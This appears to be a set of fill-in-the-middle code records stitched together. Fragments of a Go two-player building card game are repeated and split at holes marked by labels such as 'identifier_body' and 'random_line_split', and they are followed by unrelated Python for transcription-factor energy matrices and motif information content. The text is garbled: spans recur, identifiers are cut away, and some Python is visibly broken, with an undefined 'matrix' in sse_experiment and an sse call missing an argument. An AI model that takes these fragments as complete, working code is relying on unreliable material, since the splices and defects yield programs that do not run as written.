players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter)
for (stock.PullPos > -1) && ((turnLimit == 0) || (turnCount < turnLimit)) && !gameOver {
turnCount++
phase := turnToPhase(turnCount)
// for safety
// if you can't build any of the cards in your hand (because those positions are filled), you can get stuck
if turnCount > 29 {
fmt.Println("The game went to 30 turns--ending as a safety")
gameOver = true
}
// turns
var opponent player.Player
for id, currentPlayer := range players {
if id == 0 {
opponent = players[1]
} else {
opponent = players | {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
} | identifier_body |
warwick.go | parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
}
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter)
for (stock.PullPos > -1) && ((turnLimit == 0) || (turnCount < turnLimit)) && !gameOver {
turnCount++
phase := turnToPhase(turnCount)
// for safety
// if you can't build any of the cards in your hand (because those positions are filled), you can get stuck
if turnCount > 29 {
fmt.Println("The game went to 30 turns--ending as a safety")
gameOver = true
}
// turns
var opponent player.Player
for id, currentPlayer := range players {
if id == 0 {
opponent = players[1]
} else {
opponent = players[0]
}
// we keep track of messages to send to the Human player
if opponent.Human {
players[0].State = fmt.Sprintf("Turn: %d\n", turnCount + 2)
}
// if we're coming back to this player and they already have 9 cards, it's time to stop
if currentPlayer.Tableau.Fill == 9 {
gameOver = true
break;
// there is an error here in that if player 1 goes out first, player 0 doesn't get another play
}
// turn order:
// 1. Build
// 2. Attack
// 3. Trash (with Market)
// 4. Draw up to 5 OR discard down to 5
// determine card to build, cost
// determine discards
// do build
// log(2, fmt.Sprintf("Player %d hand: %s", id, currentPlayer.Hand))
// log(2, fmt.Sprintf("Player %d Tableau: %s", id, currentPlayer.Tableau))
builds := 0
// we check it each time, since if you build the card, you get to use it immediately
for builds < (currentPlayer.Tableau.BuildBonus + 1) {
buildPos, cost, upgrade := currentPlayer.PlayerChooses(legalBuildFrom, phase)
var discards []player.Pos
if buildPos.From != player.NoCard {
log(1, fmt.Sprintf("Player %d builds %s for %d", id, currentPlayer.CardByPos(buildPos), cost))
if cost > 0 {
discards = currentPlayer.ChooseDiscards(buildPos, cost, phase)
if logLevel > 1 {
fmt.Println("Player", id, "discards:")
for _, pos := range discards {
fmt.Println(currentPlayer.CardByPos(pos))
}
}
}
kind := currentPlayer.CardByPos(buildPos).Kind
cardValue := currentPlayer.CardByPos(buildPos).Cost
currentPlayer.Build(buildPos, discards, &discardPile, upgrade)
// if it's storage, you get a chance to place a card
if kind == card.Storage {
store(cardValue, &stock, &discardPile, ¤tPlayer, phase);
}
log(2, fmt.Sprintf("currentPlayer %d has %d cards left", id, currentPlayer.Hand.Count))
builds++
} else {
break;
}
}
// When they don't build, and they have cards, check if they'd like to trash and redraw
if builds == 0 {
preResetCount := currentPlayer.Hand.Count
if (currentPlayer.Human && preResetCount > 0 && currentPlayer.HumanWantsRedraw()) || (currentPlayer.Hand.Count == currentPlayer.Hand.Limit) {
// if the computer player can't build, but they have a full hand, they will get stuck. Invoke the hand reset rule
currentPlayer.Hand.Reset()
stock.RandomPull(preResetCount, players[id].Hand)
fmt.Println("Player", id, "dumps their hand and redraws")
// if you recycle your hand, you don't get to do any builds, attacks, exchanges
continue;
}
}
// ------ Attack --------- //
steal := currentPlayer.ChooseAttack(opponent, phase) // steal is a card kind
if steal != -1 | {
// log(1, fmt.Sprintf("Player %d uses %s and takes opponent's %s", id, currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal)))
if opponent.Human{
players[0].State += fmt.Sprintf("ALERT: Opponent used a %s to take your %s\n", currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal))
}
opponent.Tableau.RemoveTop(steal, currentPlayer.Hand)
// then loose your attack card
currentPlayer.Tableau.RemoveTop(card.Soldiers, &trash) // TODO: remove to trash, test if it works
} | conditional_block | |
warwick.go | open a spot that may be immediately filled from the draw, discard or hand, 2: refill that spot, 3: add another, 4: refill both
Discard vs. Trash
There are two face up piles where cards go after they're used. When building, cards go into the discard. The Market buildings
allow you to draw from the discard pile (you must draw from the top of the pile. You may not look through the pile). When
using the Market buildings you may be able to trash cards to draw cards--cards that go into the trash may never be retrieved.
Soldiers go into the trash when they're used.
Turn order:
1. Build or Upgrade
2. Attack (optional, if Soldier recruited)
3. Store (optional, if Storage built)
4. Trash (optional, if Market built)
5. Hand limit is 5, draw up to 2, or discard
- or -
Trash all cards in hand, and draw the number trashed.
Building and Upgrading:
To build a level 3 building, you need to discard 3 cards. Buildings are built using wood, metal, or stone.
There are buildings that make other buildings made of certain materials cheaper to build. For instance, an Exchange (made of wood)
costs 3, but if you have a Carpentry, it will only cost you 2. If you have a Carpentry and a Sawmill, it will only cost you 1!
Buildings can also be upgraded. If you have a building of one level (say level 1), you can lay the building
of level 2 on top of it (but not the building of level 3 or 4!). That counts as a build, but doesn't cost you
anything.
To start:
Each player gets 5 cards.
*/
package main
import (
"fmt"
"math/rand"
"time"
"github.com/chrislunt/warwick/card"
"github.com/chrislunt/warwick/player"
)
var logLevel = 2
func log(level int, message string) {
if logLevel >= level {
fmt.Println(message);
}
}
func turnToPhase(turn int) (phase int) {
if turn > 6 {
phase = 2
} else if turn > 3 {
phase = 1
} else {
phase = 0
}
return
}
func | (storePower int, stock *card.Hand, discardPile *card.Hand, player *player.Player, phase int) {
var topSpot int
switch {
case storePower == 1 || storePower == 2:
// the player may choose from hand, discard or stock to fill the storage
// if the spot is open, you may refill it
topSpot = 0
case storePower == 3 || storePower == 4:
// a second storage spot opens, fill from stock, discard or hand
// for a 4, refill either open storage spots
topSpot = 1
}
for spot := 0; spot <= topSpot; spot++ {
if (*player).Tableau.Storage[spot] == nil {
storeCard := (*player).ChooseStore(stock, discardPile, phase)
log(1, fmt.Sprintf("Stored in storage %d: %s", spot, storeCard))
(*player).Tableau.Storage[spot] = storeCard
}
}
}
func buildStock() (stock card.Hand, stockSize int) {
rand.Seed( time.Now().UTC().UnixNano() )
// double the deck. This is the canonical reference of all cards.
var allCards = append(card.Deck[:], card.Deck[:]...)
stockSize = len(allCards)
// the stock, which can shrink, is a reference to all cards
stock.Cards = make([]*card.Card, stockSize)
stock.PullPos = stockSize - 1 // the position representing the current position to draw from
/* There are two ways we could randomize, one would be randomize the stock and keep a pointer of where we currently are,
which has an up-front randomization cost, but all subsequent pulls are cheap.
*/
// TODO make this a parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
}
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter)
for (stock.PullPos > -1) && ((turnLimit == 0) || (turnCount < turnLimit)) && !gameOver {
turnCount++
phase := turnToPhase(turnCount)
// for safety
// if you can't build any of the cards in your hand (because those positions are filled), you can get stuck
if turnCount > 29 {
fmt.Println("The game went to 30 turns--ending as a safety")
gameOver = true
}
// turns
var opponent player.Player
for id, currentPlayer := range players {
if id == 0 {
opponent = players[1]
} else {
opponent = players[ | store | identifier_name |
warwick.go | Storage reconsidered: Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
re2considered: 1: store card on table, 2: store 2nd card, 3: can move card back into hand, 4: fill any open storage spots at the time you build this card
re3considered: with each level, you open a spot that must be immediately filled from the draw, discard or hand
re4considered: 1: open a spot that may be immediately filled from the draw, discard or hand, 2: refill that spot, 3: add another, 4: refill both
Discard vs. Trash
There are two face up piles where cards go after they're used. When building, cards go into the discard. The Market buildings
allow you to draw from the discard pile (you must draw from the top of the pile. You may not look through the pile). When
using the Market buildings you may be able to trash cards to draw cards--cards that go into the trash may never be retrieved.
Soldiers go into the trash when they're used.
Turn order:
1. Build or Upgrade
2. Attack (optional, if Soldier recruited)
3. Store (optional, if Storage built)
4. Trash (optional, if Market built)
5. Hand limit is 5, draw up to 2, or discard
- or -
Trash all cards in hand, and draw the number trashed.
Building and Upgrading:
To build a level 3 building, you need to discard 3 cards. Buildings are built using wood, metal, or stone.
There are buildings that make other buildings made of certain materials cheaper to build. For instance, an Exchange (made of wood)
costs 3, but if you have a Carpentry, it will only cost you 2. If you have a Carpentry and a Sawmill, it will only cost you 1!
Buildings can also be upgraded. If you have a building of one level (say level 1), you can lay the building
of level 2 on top of it (but not the building of level 3 or 4!). That counts as a build, but doesn't cost you
anything.
To start:
Each player gets 5 cards.
*/
package main
import (
"fmt"
"math/rand"
"time"
"github.com/chrislunt/warwick/card"
"github.com/chrislunt/warwick/player"
)
var logLevel = 2
func log(level int, message string) {
if logLevel >= level {
fmt.Println(message);
}
}
func turnToPhase(turn int) (phase int) {
if turn > 6 {
phase = 2
} else if turn > 3 {
phase = 1
} else {
phase = 0
}
return
}
func store(storePower int, stock *card.Hand, discardPile *card.Hand, player *player.Player, phase int) {
var topSpot int
switch {
case storePower == 1 || storePower == 2:
// the player may choose from hand, discard or stock to fill the storage
// if the spot is open, you may refill it
topSpot = 0
case storePower == 3 || storePower == 4:
// a second storage spot opens, fill from stock, discard or hand
// for a 4, refill either open storage spots
topSpot = 1
}
for spot := 0; spot <= topSpot; spot++ {
if (*player).Tableau.Storage[spot] == nil {
storeCard := (*player).ChooseStore(stock, discardPile, phase)
log(1, fmt.Sprintf("Stored in storage %d: %s", spot, storeCard))
(*player).Tableau.Storage[spot] = storeCard
}
}
}
func buildStock() (stock card.Hand, stockSize int) {
rand.Seed( time.Now().UTC().UnixNano() )
// double the deck. This is the canonical reference of all cards.
var allCards = append(card.Deck[:], card.Deck[:]...)
stockSize = len(allCards)
// the stock, which can shrink, is a reference to all cards
stock.Cards = make([]*card.Card, stockSize)
stock.PullPos = stockSize - 1 // the position representing the current position to draw from
/* There are two ways we could randomize, one would be randomize the stock and keep a pointer of where we currently are,
which has an up-front randomization cost, but all subsequent pulls are cheap.
*/
// TODO make this a parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
}
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter | Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot | random_line_split | |
energy_matrix_analysis.py | < -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman | # product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def predict_site_energy(matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
"""Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic_vs_gini_scatterplot_exp(trials=100,stopping_crit=1,filename=None):
# redo this properly!
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
# xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
# lambda(matrix,motif):propose(matrix,motif),
# (matrix,motif),
| # Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be: | random_line_split |
energy_matrix_analysis.py | -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman
# Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be:
# product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def | (matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
"""Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
